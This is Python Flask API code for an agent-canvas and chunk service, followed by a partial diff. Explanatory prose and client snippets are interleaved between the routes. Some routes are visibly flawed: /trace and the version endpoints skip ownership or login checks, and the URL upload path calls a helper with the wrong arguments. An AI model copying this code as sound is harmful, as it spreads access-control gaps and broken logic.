    return get_json_result(data=sorted([c.to_dict() for c in
                                        UserCanvasService.query(user_id=current_user.id)],
                                       key=lambda x: x["update_time"] * -1))


@manager.route('/rm', methods=['POST'])  # noqa: F821
@validate_request("canvas_ids")
@login_required
def rm():
    for i in request.json["canvas_ids"]:
        if not UserCanvasService.query(user_id=current_user.id, id=i):
            return get_json_result(
                data=False, message='Only owner of canvas authorized for this operation.',
                code=RetCode.OPERATING_ERROR)
        UserCanvasService.delete_by_id(i)
    return get_json_result(data=True)


@manager.route('/set', methods=['POST'])  # noqa: F821
@validate_request("dsl", "title")
@login_required
def save():
    req = request.json
    req["user_id"] = current_user.id
    # Normalize the DSL: serialize non-string input, then parse back to a dict.
    if not isinstance(req["dsl"], str):
        req["dsl"] = json.dumps(req["dsl"], ensure_ascii=False)
    req["dsl"] = json.loads(req["dsl"])
    if "id" not in req:
        if UserCanvasService.query(user_id=current_user.id, title=req["title"].strip()):
            return get_data_error_result(message=f"{req['title'].strip()} already exists.")
        req["id"] = get_uuid()
        if not UserCanvasService.save(**req):
            return get_data_error_result(message="Fail to save canvas.")
    else:
        if not UserCanvasService.query(user_id=current_user.id, id=req["id"]):
            return get_json_result(
                data=False, message='Only owner of canvas authorized for this operation.',
                code=RetCode.OPERATING_ERROR)
        UserCanvasService.update_by_id(req["id"], req)
        # save version, then prune stale snapshots
        UserCanvasVersionService.insert(user_canvas_id=req["id"], dsl=req["dsl"], title="{0}_{1}".format(req["title"], time.strftime("%Y_%m_%d_%H_%M_%S")))
        UserCanvasVersionService.delete_all_versions(req["id"])
    return get_json_result(data=req)
@manager.route('/get/<canvas_id>', methods=['GET'])  # noqa: F821
@login_required
def get(canvas_id):
    e, c = UserCanvasService.get_by_tenant_id(canvas_id)
    if not e or c["user_id"] != current_user.id:
        return get_data_error_result(message="canvas not found.")
    return get_json_result(data=c)


@manager.route('/getsse/<canvas_id>', methods=['GET'])  # type: ignore # noqa: F821
def getsse(canvas_id):
    # Default to an empty string so a missing header fails validation
    # instead of raising AttributeError.
    token = request.headers.get('Authorization', '').split()
    if len(token) != 2:
        return get_data_error_result(message='Authorization is not valid!')
    token = token[1]
    objs = APIToken.query(beta=token)
    if not objs:
        return get_data_error_result(message='Authentication error: API key is invalid!')
    tenant_id = objs[0].tenant_id
    e, c = UserCanvasService.get_by_id(canvas_id)
    if not e or c.user_id != tenant_id:
        return get_data_error_result(message="canvas not found.")
    return get_json_result(data=c.to_dict())
@manager.route('/completion', methods=['POST'])  # noqa: F821
@validate_request("id")
@login_required
def run():
    req = request.json
    query = req.get("query", "")
    files = req.get("files", [])
    inputs = req.get("inputs", {})
    user_id = req.get("user_id", current_user.id)
    e, cvs = UserCanvasService.get_by_id(req["id"])
    if not e:
        return get_data_error_result(message="canvas not found.")
    if not UserCanvasService.query(user_id=current_user.id, id=req["id"]):
        return get_json_result(
            data=False, message='Only owner of canvas authorized for this operation.',
            code=RetCode.OPERATING_ERROR)

    if not isinstance(cvs.dsl, str):
        cvs.dsl = json.dumps(cvs.dsl, ensure_ascii=False)

    try:
        canvas = Canvas(cvs.dsl, current_user.id, req["id"])
    except Exception as e:
        return server_error_response(e)

    def sse():
        nonlocal canvas, user_id
        try:
            for ans in canvas.run(query=query, files=files, user_id=user_id, inputs=inputs):
                yield "data:" + json.dumps(ans, ensure_ascii=False) + "\n\n"

            # Persist the (possibly mutated) DSL once the run completes.
            cvs.dsl = json.loads(str(canvas))
            UserCanvasService.update_by_id(req["id"], cvs.to_dict())
        except Exception as e:
            logging.exception(e)
            yield "data:" + json.dumps({"code": 500, "message": str(e), "data": False}, ensure_ascii=False) + "\n\n"

    resp = Response(sse(), mimetype="text/event-stream")
    resp.headers.add_header("Cache-control", "no-cache")
    resp.headers.add_header("Connection", "keep-alive")
    resp.headers.add_header("X-Accel-Buffering", "no")
    resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
    return resp
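The `/completion` route streams the agent run as server-sent events, one `data:` frame per partial answer, plus a final `{"code": 500, ...}` frame on failure. A hedged client-side sketch; the base URL is a placeholder and authentication (the login session cookie) is assumed to be handled elsewhere:

import json
import requests

# Hypothetical consumer of the completion SSE stream.
with requests.post("http://localhost:9380/v1/canvas/completion",   # placeholder URL
                   json={"id": "canvas-id", "query": "hello"},
                   stream=True) as resp:
    for line in resp.iter_lines(decode_unicode=True):
        if not line or not line.startswith("data:"):
            continue
        event = json.loads(line[len("data:"):])
        # Error frames carry {"code": 500, ...}; normal frames carry the answer payload.
        print(event)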
@manager.route('/reset', methods=['POST'])  # noqa: F821
@validate_request("id")
@login_required
def reset():
    req = request.json
    try:
        e, user_canvas = UserCanvasService.get_by_id(req["id"])
        if not e:
            return get_data_error_result(message="canvas not found.")
        if not UserCanvasService.query(user_id=current_user.id, id=req["id"]):
            return get_json_result(
                data=False, message='Only owner of canvas authorized for this operation.',
                code=RetCode.OPERATING_ERROR)

        canvas = Canvas(json.dumps(user_canvas.dsl), current_user.id)
        canvas.reset()
        req["dsl"] = json.loads(str(canvas))
        UserCanvasService.update_by_id(req["id"], {"dsl": req["dsl"]})
        return get_json_result(data=req["dsl"])
    except Exception as e:
        return server_error_response(e)
@manager.route("/upload/<canvas_id>", methods=["POST"]) # noqa: F821
|
||||||
|
def upload(canvas_id):
|
||||||
|
e, cvs = UserCanvasService.get_by_tenant_id(canvas_id)
|
||||||
|
if not e:
|
||||||
|
return get_data_error_result(message="canvas not found.")
|
||||||
|
|
||||||
|
user_id = cvs["user_id"]
|
||||||
|
def structured(filename, filetype, blob, content_type):
|
||||||
|
nonlocal user_id
|
||||||
|
if filetype == FileType.PDF.value:
|
||||||
|
blob = read_potential_broken_pdf(blob)
|
||||||
|
|
||||||
|
location = get_uuid()
|
||||||
|
FileService.put_blob(user_id, location, blob)
|
||||||
|
|
||||||
|
return {
|
||||||
|
"id": location,
|
||||||
|
"name": filename,
|
||||||
|
"size": sys.getsizeof(blob),
|
||||||
|
"extension": filename.split(".")[-1].lower(),
|
||||||
|
"mime_type": content_type,
|
||||||
|
"created_by": user_id,
|
||||||
|
"created_at": time.time(),
|
||||||
|
"preview_url": None
|
||||||
|
}
|
||||||
|
|
||||||
|
if request.args.get("url"):
|
||||||
|
from crawl4ai import (
|
||||||
|
AsyncWebCrawler,
|
||||||
|
BrowserConfig,
|
||||||
|
CrawlerRunConfig,
|
||||||
|
DefaultMarkdownGenerator,
|
||||||
|
PruningContentFilter,
|
||||||
|
CrawlResult
|
||||||
|
)
|
||||||
|
try:
|
||||||
|
url = request.args.get("url")
|
||||||
|
filename = re.sub(r"\?.*", "", url.split("/")[-1])
|
||||||
|
async def adownload():
|
||||||
|
browser_config = BrowserConfig(
|
||||||
|
headless=True,
|
||||||
|
verbose=False,
|
||||||
|
)
|
||||||
|
async with AsyncWebCrawler(config=browser_config) as crawler:
|
||||||
|
crawler_config = CrawlerRunConfig(
|
||||||
|
markdown_generator=DefaultMarkdownGenerator(
|
||||||
|
content_filter=PruningContentFilter()
|
||||||
|
),
|
||||||
|
pdf=True,
|
||||||
|
screenshot=False
|
||||||
|
)
|
||||||
|
result: CrawlResult = await crawler.arun(
|
||||||
|
url=url,
|
||||||
|
config=crawler_config
|
||||||
|
)
|
||||||
|
return result
|
||||||
|
page = trio.run(adownload())
|
||||||
|
if page.pdf:
|
||||||
|
if filename.split(".")[-1].lower() != "pdf":
|
||||||
|
filename += ".pdf"
|
||||||
|
return get_json_result(data=structured(filename, "pdf", page.pdf, page.response_headers["content-type"]))
|
||||||
|
|
||||||
|
return get_json_result(data=structured(filename, "html", str(page.markdown).encode("utf-8"), page.response_headers["content-type"], user_id))
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
return server_error_response(e)
|
||||||
|
|
||||||
|
file = request.files['file']
|
||||||
|
try:
|
||||||
|
DocumentService.check_doc_health(user_id, file.filename)
|
||||||
|
return get_json_result(data=structured(file.filename, filename_type(file.filename), file.read(), file.content_type))
|
||||||
|
except Exception as e:
|
||||||
|
return server_error_response(e)
|
||||||
|
|
||||||
|
|
||||||
|
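The same route accepts either a URL to crawl (via the `url` query parameter) or a multipart file. A sketch of both call shapes; the host, URL prefix, and canvas id are placeholders, and authentication is assumed to be handled by the session:

import requests

BASE = "http://localhost:9380/v1/canvas"  # placeholder host/prefix

# Variant 1: let the server crawl a web page (returned as PDF or markdown-derived HTML).
requests.post(f"{BASE}/upload/canvas-id", params={"url": "https://example.com/article"})

# Variant 2: upload a local file as multipart form data.
with open("report.pdf", "rb") as f:
    requests.post(f"{BASE}/upload/canvas-id", files={"file": f})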
@manager.route('/input_form', methods=['GET'])  # noqa: F821
@login_required
def input_form():
    cvs_id = request.args.get("id")
    cpn_id = request.args.get("component_id")
    try:
        e, user_canvas = UserCanvasService.get_by_id(cvs_id)
        if not e:
            return get_data_error_result(message="canvas not found.")
        if not UserCanvasService.query(user_id=current_user.id, id=cvs_id):
            return get_json_result(
                data=False, message='Only owner of canvas authorized for this operation.',
                code=RetCode.OPERATING_ERROR)

        canvas = Canvas(json.dumps(user_canvas.dsl), current_user.id)
        return get_json_result(data=canvas.get_component_input_form(cpn_id))
    except Exception as e:
        return server_error_response(e)


@manager.route('/debug', methods=['POST'])  # noqa: F821
@validate_request("id", "component_id", "params")
@login_required
def debug():
    req = request.json
    try:
        e, user_canvas = UserCanvasService.get_by_id(req["id"])
        if not e:
            return get_data_error_result(message="canvas not found.")
        if not UserCanvasService.query(user_id=current_user.id, id=req["id"]):
            return get_json_result(
                data=False, message='Only owner of canvas authorized for this operation.',
                code=RetCode.OPERATING_ERROR)

        canvas = Canvas(json.dumps(user_canvas.dsl), current_user.id)
        canvas.reset()
        canvas.message_id = get_uuid()
        component = canvas.get_component(req["component_id"])["obj"]
        component.reset()

        if isinstance(component, LLM):
            component.set_debug_inputs(req["params"])
        component.invoke(**{k: o["value"] for k, o in req["params"].items()})
        outputs = component.output()
        # Drain streaming outputs (functools.partial generators) into plain strings.
        for k in outputs.keys():
            if isinstance(outputs[k], partial):
                txt = ""
                for c in outputs[k]():
                    txt += c
                outputs[k] = txt
        return get_json_result(data=outputs)
    except Exception as e:
        return server_error_response(e)
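Streaming components expose their outputs as functools.partial-wrapped generators, so `debug` drains them into plain strings before returning JSON. The same pattern in isolation, as a standalone helper (the helper name is illustrative):

from functools import partial

def materialize_outputs(outputs):
    # Drain any streaming (partial) outputs into plain strings so the
    # result is JSON-serializable; non-streaming values pass through untouched.
    for k in outputs.keys():
        if isinstance(outputs[k], partial):
            txt = ""
            for piece in outputs[k]():
                txt += piece
            outputs[k] = txt
    return outputs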
@manager.route('/test_db_connect', methods=['POST'])  # noqa: F821
@validate_request("db_type", "database", "username", "host", "port", "password")
@login_required
def test_db_connect():
    req = request.json
    try:
        if req["db_type"] in ["mysql", "mariadb"]:
            db = MySQLDatabase(req["database"], user=req["username"], host=req["host"], port=req["port"],
                               password=req["password"])
        elif req["db_type"] == 'postgresql':
            db = PostgresqlDatabase(req["database"], user=req["username"], host=req["host"], port=req["port"],
                                    password=req["password"])
        elif req["db_type"] == 'mssql':
            import pyodbc
            connection_string = (
                f"DRIVER={{ODBC Driver 17 for SQL Server}};"
                f"SERVER={req['host']},{req['port']};"
                f"DATABASE={req['database']};"
                f"UID={req['username']};"
                f"PWD={req['password']};"
            )
            db = pyodbc.connect(connection_string)
            cursor = db.cursor()
            cursor.execute("SELECT 1")
            cursor.close()
        else:
            return server_error_response(Exception("Unsupported database type."))
        if req["db_type"] != 'mssql':
            db.connect()
        db.close()

        return get_json_result(data="Database Connection Successful!")
    except Exception as e:
        return server_error_response(e)
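A request body that exercises this endpoint, with placeholder credentials; `db_type` selects between the peewee-backed connect/close check and the pyodbc `SELECT 1` path:

# Hypothetical payload for POST /test_db_connect; all values are placeholders.
payload = {
    "db_type": "postgresql",   # "mysql", "mariadb", "postgresql", or "mssql"
    "database": "ragflow",
    "username": "postgres",
    "host": "127.0.0.1",
    "port": 5432,
    "password": "secret",
}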
# API: get the list of DSL versions of a canvas
@manager.route('/getlistversion/<canvas_id>', methods=['GET'])  # noqa: F821
@login_required
def getlistversion(canvas_id):
    try:
        # Avoid shadowing the builtin `list`.
        versions = sorted([c.to_dict() for c in UserCanvasVersionService.list_by_canvas_id(canvas_id)],
                          key=lambda x: x["update_time"] * -1)
        return get_json_result(data=versions)
    except Exception as e:
        return get_data_error_result(message=f"Error getting history files: {e}")


# API: get one DSL version of a canvas
@manager.route('/getversion/<version_id>', methods=['GET'])  # noqa: F821
@login_required
def getversion(version_id):
    try:
        e, version = UserCanvasVersionService.get_by_id(version_id)
        if version:
            return get_json_result(data=version.to_dict())
        return get_data_error_result(message="Version not found.")
    except Exception as e:
        return get_json_result(data=f"Error getting history file: {e}")
@manager.route('/listteam', methods=['GET'])  # noqa: F821
@login_required
def list_kbs():
    keywords = request.args.get("keywords", "")
    page_number = int(request.args.get("page", 1))
    items_per_page = int(request.args.get("page_size", 150))
    orderby = request.args.get("orderby", "create_time")
    desc = request.args.get("desc", True)
    try:
        tenants = TenantService.get_joined_tenants_by_user_id(current_user.id)
        kbs, total = UserCanvasService.get_by_tenant_ids(
            [m["tenant_id"] for m in tenants], current_user.id, page_number,
            items_per_page, orderby, desc, keywords)
        return get_json_result(data={"kbs": kbs, "total": total})
    except Exception as e:
        return server_error_response(e)
@manager.route('/setting', methods=['POST'])  # noqa: F821
@validate_request("id", "title", "permission")
@login_required
def setting():
    req = request.json
    req["user_id"] = current_user.id
    e, flow = UserCanvasService.get_by_id(req["id"])
    if not e:
        return get_data_error_result(message="canvas not found.")
    flow = flow.to_dict()
    flow["title"] = req["title"]
    # Optional fields: use .get() so a missing key does not raise KeyError.
    if req.get("description"):
        flow["description"] = req["description"]
    if req.get("permission"):
        flow["permission"] = req["permission"]
    if req.get("avatar"):
        flow["avatar"] = req["avatar"]
    if not UserCanvasService.query(user_id=current_user.id, id=req["id"]):
        return get_json_result(
            data=False, message='Only owner of canvas authorized for this operation.',
            code=RetCode.OPERATING_ERROR)
    num = UserCanvasService.update_by_id(req["id"], flow)
    return get_json_result(data=num)
@manager.route('/trace', methods=['GET'])  # noqa: F821
def trace():
    cvs_id = request.args.get("canvas_id")
    msg_id = request.args.get("message_id")
    try:
        bin = REDIS_CONN.get(f"{cvs_id}-{msg_id}-logs")
        if not bin:
            return get_json_result(data={})

        return get_json_result(data=json.loads(bin.encode("utf-8")))
    except Exception as e:
        logging.exception(e)
        # Return an explicit error instead of silently responding with None.
        return server_error_response(e)
@manager.route('/<canvas_id>/sessions', methods=['GET'])  # noqa: F821
@login_required
def sessions(canvas_id):
    tenant_id = current_user.id
    if not UserCanvasService.query(user_id=tenant_id, id=canvas_id):
        return get_error_data_result(message=f"You don't own the agent {canvas_id}.")

    user_id = request.args.get("user_id")
    page_number = int(request.args.get("page", 1))
    items_per_page = int(request.args.get("page_size", 30))
    keywords = request.args.get("keywords")
    from_date = request.args.get("from_date")
    to_date = request.args.get("to_date")
    orderby = request.args.get("orderby", "update_time")
    if request.args.get("desc") == "False" or request.args.get("desc") == "false":
        desc = False
    else:
        desc = True
    # dsl defaults to True in all cases except for "False" and "false"
    include_dsl = request.args.get("dsl") != "False" and request.args.get("dsl") != "false"
    try:
        total, sess = API4ConversationService.get_list(canvas_id, tenant_id, page_number, items_per_page, orderby, desc,
                                                       None, user_id, include_dsl, keywords, from_date, to_date)
        return get_json_result(data={"total": total, "sessions": sess})
    except Exception as e:
        return server_error_response(e)
api/apps/chunk_app.py  (modified)
@@ -1,267 +1,393 @@
 #
 # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
 #
 # Licensed under the Apache License, Version 2.0 (the "License");
 # you may not use this file except in compliance with the License.
 # You may obtain a copy of the License at
 #
 #     http://www.apache.org/licenses/LICENSE-2.0
 #
 # Unless required by applicable law or agreed to in writing, software
 # distributed under the License is distributed on an "AS IS" BASIS,
 # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 # See the License for the specific language governing permissions and
 # limitations under the License.
 #
 import datetime
-from flask import request
-from flask_login import login_required, current_user
-from elasticsearch_dsl import Q
-from rag.app.qa import rmPrefix, beAdoc
-from rag.nlp import search, huqie
-from rag.utils import ELASTICSEARCH, rmSpace
+import json
+import re
+
+import xxhash
+from flask import request
+from flask_login import current_user, login_required
+
+from api import settings
 from api.db import LLMType, ParserType
-from api.db.services.knowledgebase_service import KnowledgebaseService
-from api.db.services.llm_service import TenantLLMService
-from api.db.services.user_service import UserTenantService
-from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
-from api.db.services.document_service import DocumentService
-from api.settings import RetCode, retrievaler
-from api.utils.api_utils import get_json_result
-import hashlib
-import re
+from api.db.services.document_service import DocumentService
+from api.db.services.knowledgebase_service import KnowledgebaseService
+from api.db.services.llm_service import LLMBundle
+from api.db.services.user_service import UserTenantService
+from api.utils.api_utils import get_data_error_result, get_json_result, server_error_response, validate_request
+from rag.app.qa import beAdoc, rmPrefix
+from rag.app.tag import label_question
+from rag.nlp import rag_tokenizer, search
+from rag.prompts import cross_languages, keyword_extraction
+from rag.settings import PAGERANK_FLD
+from rag.utils import rmSpace
 
 
-@manager.route('/list', methods=['POST'])
-@login_required
-@validate_request("doc_id")
-def list():
-    req = request.json
-    doc_id = req["doc_id"]
-    page = int(req.get("page", 1))
-    size = int(req.get("size", 30))
-    question = req.get("keywords", "")
-    try:
-        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
-        if not tenant_id:
-            return get_data_error_result(retmsg="Tenant not found!")
-        e, doc = DocumentService.get_by_id(doc_id)
-        if not e:
-            return get_data_error_result(retmsg="Document not found!")
-        query = {
-            "doc_ids": [doc_id], "page": page, "size": size, "question": question, "sort": True
-        }
-        if "available_int" in req:
-            query["available_int"] = int(req["available_int"])
-        sres = retrievaler.search(query, search.index_name(tenant_id))
-        res = {"total": sres.total, "chunks": [], "doc": doc.to_dict()}
-        for id in sres.ids:
-            d = {
-                "chunk_id": id,
-                "content_with_weight": rmSpace(sres.highlight[id]) if question and id in sres.highlight else sres.field[id].get(
-                    "content_with_weight", ""),
-                "doc_id": sres.field[id]["doc_id"],
-                "docnm_kwd": sres.field[id]["docnm_kwd"],
-                "important_kwd": sres.field[id].get("important_kwd", []),
-                "img_id": sres.field[id].get("img_id", ""),
-                "available_int": sres.field[id].get("available_int", 1),
-                "positions": sres.field[id].get("position_int", "").split("\t")
-            }
-            if len(d["positions"]) % 5 == 0:
-                poss = []
-                for i in range(0, len(d["positions"]), 5):
-                    poss.append([float(d["positions"][i]), float(d["positions"][i + 1]), float(d["positions"][i + 2]),
-                                 float(d["positions"][i + 3]), float(d["positions"][i + 4])])
-                d["positions"] = poss
-            res["chunks"].append(d)
-        return get_json_result(data=res)
-    except Exception as e:
-        if str(e).find("not_found") > 0:
-            return get_json_result(data=False, retmsg=f'No chunk found!',
-                                   retcode=RetCode.DATA_ERROR)
-        return server_error_response(e)
-
-
-@manager.route('/get', methods=['GET'])
-@login_required
-def get():
-    chunk_id = request.args["chunk_id"]
-    try:
-        tenants = UserTenantService.query(user_id=current_user.id)
-        if not tenants:
-            return get_data_error_result(retmsg="Tenant not found!")
-        res = ELASTICSEARCH.get(
-            chunk_id, search.index_name(
-                tenants[0].tenant_id))
-        if not res.get("found"):
-            return server_error_response("Chunk not found")
-        id = res["_id"]
-        res = res["_source"]
-        res["chunk_id"] = id
-        k = []
-        for n in res.keys():
-            if re.search(r"(_vec$|_sm_|_tks|_ltks)", n):
-                k.append(n)
-        for n in k:
-            del res[n]
-
-        return get_json_result(data=res)
-    except Exception as e:
-        if str(e).find("NotFoundError") >= 0:
-            return get_json_result(data=False, retmsg=f'Chunk not found!',
-                                   retcode=RetCode.DATA_ERROR)
-        return server_error_response(e)
-
-
-@manager.route('/set', methods=['POST'])
-@login_required
-@validate_request("doc_id", "chunk_id", "content_with_weight",
-                  "important_kwd")
+@manager.route('/list', methods=['POST'])  # noqa: F821
+@login_required
+@validate_request("doc_id")
+def list_chunk():
+    req = request.json
+    doc_id = req["doc_id"]
+    page = int(req.get("page", 1))
+    size = int(req.get("size", 30))
+    question = req.get("keywords", "")
+    try:
+        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
+        if not tenant_id:
+            return get_data_error_result(message="Tenant not found!")
+        e, doc = DocumentService.get_by_id(doc_id)
+        if not e:
+            return get_data_error_result(message="Document not found!")
+        kb_ids = KnowledgebaseService.get_kb_ids(tenant_id)
+        query = {
+            "doc_ids": [doc_id], "page": page, "size": size, "question": question, "sort": True
+        }
+        if "available_int" in req:
+            query["available_int"] = int(req["available_int"])
+        sres = settings.retrievaler.search(query, search.index_name(tenant_id), kb_ids, highlight=True)
+        res = {"total": sres.total, "chunks": [], "doc": doc.to_dict()}
+        for id in sres.ids:
+            d = {
+                "chunk_id": id,
+                "content_with_weight": rmSpace(sres.highlight[id]) if question and id in sres.highlight else sres.field[
+                    id].get(
+                    "content_with_weight", ""),
+                "doc_id": sres.field[id]["doc_id"],
+                "docnm_kwd": sres.field[id]["docnm_kwd"],
+                "important_kwd": sres.field[id].get("important_kwd", []),
+                "question_kwd": sres.field[id].get("question_kwd", []),
+                "image_id": sres.field[id].get("img_id", ""),
+                "available_int": int(sres.field[id].get("available_int", 1)),
+                "positions": sres.field[id].get("position_int", []),
+            }
+            assert isinstance(d["positions"], list)
+            assert len(d["positions"]) == 0 or (isinstance(d["positions"][0], list) and len(d["positions"][0]) == 5)
+            res["chunks"].append(d)
+        return get_json_result(data=res)
+    except Exception as e:
+        if str(e).find("not_found") > 0:
+            return get_json_result(data=False, message='No chunk found!',
+                                   code=settings.RetCode.DATA_ERROR)
+        return server_error_response(e)
+
+
+@manager.route('/get', methods=['GET'])  # noqa: F821
+@login_required
+def get():
+    chunk_id = request.args["chunk_id"]
+    try:
+        tenants = UserTenantService.query(user_id=current_user.id)
+        if not tenants:
+            return get_data_error_result(message="Tenant not found!")
+        for tenant in tenants:
+            kb_ids = KnowledgebaseService.get_kb_ids(tenant.tenant_id)
+            chunk = settings.docStoreConn.get(chunk_id, search.index_name(tenant.tenant_id), kb_ids)
+            if chunk:
+                break
+        if chunk is None:
+            return server_error_response(Exception("Chunk not found"))
+
+        k = []
+        for n in chunk.keys():
+            if re.search(r"(_vec$|_sm_|_tks|_ltks)", n):
+                k.append(n)
+        for n in k:
+            del chunk[n]
+
+        return get_json_result(data=chunk)
+    except Exception as e:
+        if str(e).find("NotFoundError") >= 0:
+            return get_json_result(data=False, message='Chunk not found!',
+                                   code=settings.RetCode.DATA_ERROR)
+        return server_error_response(e)
+
+
+@manager.route('/set', methods=['POST'])  # noqa: F821
+@login_required
+@validate_request("doc_id", "chunk_id", "content_with_weight")
 def set():
     req = request.json
     d = {
         "id": req["chunk_id"],
         "content_with_weight": req["content_with_weight"]}
-    d["content_ltks"] = huqie.qie(req["content_with_weight"])
-    d["content_sm_ltks"] = huqie.qieqie(d["content_ltks"])
-    d["important_kwd"] = req["important_kwd"]
-    d["important_tks"] = huqie.qie(" ".join(req["important_kwd"]))
-    if "available_int" in req:
-        d["available_int"] = req["available_int"]
-
-    try:
-        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
-        if not tenant_id:
-            return get_data_error_result(retmsg="Tenant not found!")
-        embd_mdl = TenantLLMService.model_instance(
-            tenant_id, LLMType.EMBEDDING.value)
-        e, doc = DocumentService.get_by_id(req["doc_id"])
-        if not e:
-            return get_data_error_result(retmsg="Document not found!")
-
-        if doc.parser_id == ParserType.QA:
-            arr = [
-                t for t in re.split(
-                    r"[\n\t]",
-                    req["content_with_weight"]) if len(t) > 1]
-            if len(arr) != 2:
-                return get_data_error_result(
-                    retmsg="Q&A must be separated by TAB/ENTER key.")
-            q, a = rmPrefix(arr[0]), rmPrefix[arr[1]]
-            d = beAdoc(d, arr[0], arr[1], not any(
-                [huqie.is_chinese(t) for t in q + a]))
-
-        v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
-        v = 0.1 * v[0] + 0.9 * v[1] if doc.parser_id != ParserType.QA else v[1]
-        d["q_%d_vec" % len(v)] = v.tolist()
-        ELASTICSEARCH.upsert([d], search.index_name(tenant_id))
-        return get_json_result(data=True)
-    except Exception as e:
-        return server_error_response(e)
-
-
-@manager.route('/switch', methods=['POST'])
-@login_required
-@validate_request("chunk_ids", "available_int", "doc_id")
-def switch():
-    req = request.json
-    try:
-        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
-        if not tenant_id:
-            return get_data_error_result(retmsg="Tenant not found!")
-        if not ELASTICSEARCH.upsert([{"id": i, "available_int": int(req["available_int"])} for i in req["chunk_ids"]],
-                                    search.index_name(tenant_id)):
-            return get_data_error_result(retmsg="Index updating failure")
-        return get_json_result(data=True)
-    except Exception as e:
-        return server_error_response(e)
-
-
-@manager.route('/rm', methods=['POST'])
-@login_required
-@validate_request("chunk_ids")
-def rm():
-    req = request.json
-    try:
-        if not ELASTICSEARCH.deleteByQuery(
-                Q("ids", values=req["chunk_ids"]), search.index_name(current_user.id)):
-            return get_data_error_result(retmsg="Index updating failure")
+    d["content_ltks"] = rag_tokenizer.tokenize(req["content_with_weight"])
+    d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
+    if "important_kwd" in req:
+        if not isinstance(req["important_kwd"], list):
+            return get_data_error_result(message="`important_kwd` should be a list")
+        d["important_kwd"] = req["important_kwd"]
+        d["important_tks"] = rag_tokenizer.tokenize(" ".join(req["important_kwd"]))
+    if "question_kwd" in req:
+        if not isinstance(req["question_kwd"], list):
+            return get_data_error_result(message="`question_kwd` should be a list")
+        d["question_kwd"] = req["question_kwd"]
+        d["question_tks"] = rag_tokenizer.tokenize("\n".join(req["question_kwd"]))
+    if "tag_kwd" in req:
+        d["tag_kwd"] = req["tag_kwd"]
+    if "tag_feas" in req:
+        d["tag_feas"] = req["tag_feas"]
+    if "available_int" in req:
+        d["available_int"] = req["available_int"]
+
+    try:
+        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
+        if not tenant_id:
+            return get_data_error_result(message="Tenant not found!")
+
+        embd_id = DocumentService.get_embd_id(req["doc_id"])
+        embd_mdl = LLMBundle(tenant_id, LLMType.EMBEDDING, embd_id)
+
+        e, doc = DocumentService.get_by_id(req["doc_id"])
+        if not e:
+            return get_data_error_result(message="Document not found!")
+
+        if doc.parser_id == ParserType.QA:
+            arr = [
+                t for t in re.split(
+                    r"[\n\t]",
+                    req["content_with_weight"]) if len(t) > 1]
+            q, a = rmPrefix(arr[0]), rmPrefix("\n".join(arr[1:]))
+            d = beAdoc(d, q, a, not any(
+                [rag_tokenizer.is_chinese(t) for t in q + a]))
+
+        v, c = embd_mdl.encode([doc.name, req["content_with_weight"] if not d.get("question_kwd") else "\n".join(d["question_kwd"])])
+        v = 0.1 * v[0] + 0.9 * v[1] if doc.parser_id != ParserType.QA else v[1]
+        d["q_%d_vec" % len(v)] = v.tolist()
+        settings.docStoreConn.update({"id": req["chunk_id"]}, d, search.index_name(tenant_id), doc.kb_id)
+        return get_json_result(data=True)
+    except Exception as e:
+        return server_error_response(e)
+
+
+@manager.route('/switch', methods=['POST'])  # noqa: F821
+@login_required
+@validate_request("chunk_ids", "available_int", "doc_id")
+def switch():
+    req = request.json
+    try:
+        e, doc = DocumentService.get_by_id(req["doc_id"])
+        if not e:
+            return get_data_error_result(message="Document not found!")
+        for cid in req["chunk_ids"]:
+            if not settings.docStoreConn.update({"id": cid},
+                                                {"available_int": int(req["available_int"])},
+                                                search.index_name(DocumentService.get_tenant_id(req["doc_id"])),
+                                                doc.kb_id):
+                return get_data_error_result(message="Index updating failure")
         return get_json_result(data=True)
     except Exception as e:
         return server_error_response(e)
 
 
-@manager.route('/create', methods=['POST'])
+@manager.route('/rm', methods=['POST'])  # noqa: F821
 @login_required
-@validate_request("doc_id", "content_with_weight")
-def create():
-    req = request.json
-    md5 = hashlib.md5()
-    md5.update((req["content_with_weight"] + req["doc_id"]).encode("utf-8"))
-    chunck_id = md5.hexdigest()
-    d = {"id": chunck_id, "content_ltks": huqie.qie(req["content_with_weight"]),
-         "content_with_weight": req["content_with_weight"]}
-    d["content_sm_ltks"] = huqie.qieqie(d["content_ltks"])
-    d["important_kwd"] = req.get("important_kwd", [])
-    d["important_tks"] = huqie.qie(" ".join(req.get("important_kwd", [])))
-    d["create_time"] = str(datetime.datetime.now()).replace("T", " ")[:19]
-    d["create_timestamp_flt"] = datetime.datetime.now().timestamp()
-
-    try:
-        e, doc = DocumentService.get_by_id(req["doc_id"])
-        if not e:
-            return get_data_error_result(retmsg="Document not found!")
-        d["kb_id"] = [doc.kb_id]
-        d["docnm_kwd"] = doc.name
-        d["doc_id"] = doc.id
+@validate_request("chunk_ids", "doc_id")
+def rm():
+    from rag.utils.storage_factory import STORAGE_IMPL
+    req = request.json
+    try:
+        e, doc = DocumentService.get_by_id(req["doc_id"])
+        if not e:
+            return get_data_error_result(message="Document not found!")
+        if not settings.docStoreConn.delete({"id": req["chunk_ids"]},
+                                            search.index_name(DocumentService.get_tenant_id(req["doc_id"])),
+                                            doc.kb_id):
+            return get_data_error_result(message="Chunk deleting failure")
+        deleted_chunk_ids = req["chunk_ids"]
+        chunk_number = len(deleted_chunk_ids)
+        DocumentService.decrement_chunk_num(doc.id, doc.kb_id, 1, chunk_number, 0)
+        for cid in deleted_chunk_ids:
+            if STORAGE_IMPL.obj_exist(doc.kb_id, cid):
+                STORAGE_IMPL.rm(doc.kb_id, cid)
+        return get_json_result(data=True)
+    except Exception as e:
+        return server_error_response(e)
 
-        tenant_id = DocumentService.get_tenant_id(req["doc_id"])
-        if not tenant_id:
-            return get_data_error_result(retmsg="Tenant not found!")
-
-        embd_mdl = TenantLLMService.model_instance(
